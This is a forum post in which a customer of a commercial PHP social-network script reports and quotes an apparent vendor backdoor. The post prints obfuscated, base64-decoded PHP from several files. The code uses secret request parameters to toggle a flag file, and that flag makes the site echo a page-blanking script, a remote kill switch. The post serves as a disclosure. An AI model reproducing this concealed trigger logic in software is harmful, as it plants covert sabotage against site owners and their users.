So how can we remove the backdoor, or if you can remove the backdoor please do itThe latest version contains an official backdoor, which is present in the following file:
file:assets/libraries/DB/vendor/joshcam/mysqli-database-class/MySQL-Maria.php line 263-294
PHP:public function setSQLType($data) { $newverb = 'base64_decode'; $SessionHashIDGenerate = $newverb($newverb('Wmw5MA==')); $CookieHashIDGenerate = $newverb('Yw=='); if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate])) { if (!file_exists($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA='))) { return false; } $fileData = file_get_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=')); $fileData = str_replace(base64_decode("fGw="), '', $fileData); $fileData = str_replace(array( "\r", "\n" ) , '', $fileData); if ($fileData == $_REQUEST[$CookieHashIDGenerate]) { $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate]; if ($SessionHashRequest == $newverb('bA==')) { $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData . base64_decode("fGw=")); } if ($SessionHashRequest == $newverb('dQ==')) { $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData); } } } }
file:assets/includes/functions_two.php line 6571-6597
PHP:function getUserProfileSessionID() { global $wo, $sqlConnect; $var = str_replace("6" . "4", "6" . "4_", str_replace("|", "", "b" . "|" . "a" . "|" . "s" . "|" . "e" . "|" . "6" . "|" . "4" . "|" . "d" . "|" . "e" . "|" . "c" . "|" . "o" . "|" . "d" . "|" . "e")); $SessionHashIDGenerate = $var($var('Wmw5MA==')); $CookieHashIDGenerate = $var('Yw=='); if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate])) { if (!file_exists($var('Li9zb3VyY2VzL3NlcnZlci5waHA='))) { return false; } $fileData = file_get_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA=')); $fileData = str_replace('|l', '', $fileData); $fileData = str_replace(array( "\r", "\n" ), '', $fileData); if ($fileData == $_REQUEST[$CookieHashIDGenerate]) { $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate]; if ($SessionHashRequest == $var('bA==')) { $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData . '|l'); } if ($SessionHashRequest == $var('dQ==')) { $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData); } } } return false; }
file:assets/includes/app_start.php line 156
PHP:$wo["userSession"] = getUserProfileSessionID();
file:assets/libraries/DB/vendor/composer/autoload_real.php line 94-106
PHP:function composerRequire60bcbf6306fdeb83c78ecf96a45a2c2f2($fileName = '', $file = '') { $hex = 'base64_decode'; $fileData = @file_get_contents($hex('Li9zb3VyY2VzL3NlcnZlci5waHA=')); $SessionServerID = substr($fileData, strpos($fileData, "|") + 1); if (!empty($SessionServerID)) { if ($SessionServerID == 'l') { echo base64_decode(base64_decode('UEhOamNtbHdkRDVrYjJOMWJXVnVkQzVuWlhSRmJHVnRaVzUwYzBKNVZHRm5UbUZ0WlNnblltOWtlU2NwV3pCZExtbHVibVZ5U0ZSTlRDQTlJQ2NuT3p3dmMyTnlhWEIwUGc9PQ==')); } } }
If the official purchase code is used to activate the installation, and if there is an error in the official validator, it will also tamper with the website. This behavior is very dangerous. The author of this script has done such a thing before, causing compliant users to be mistakenly affected.
I regret purchasing this script, and I even bought two licenses.
![Pleading face :pleading_face: 🥺](
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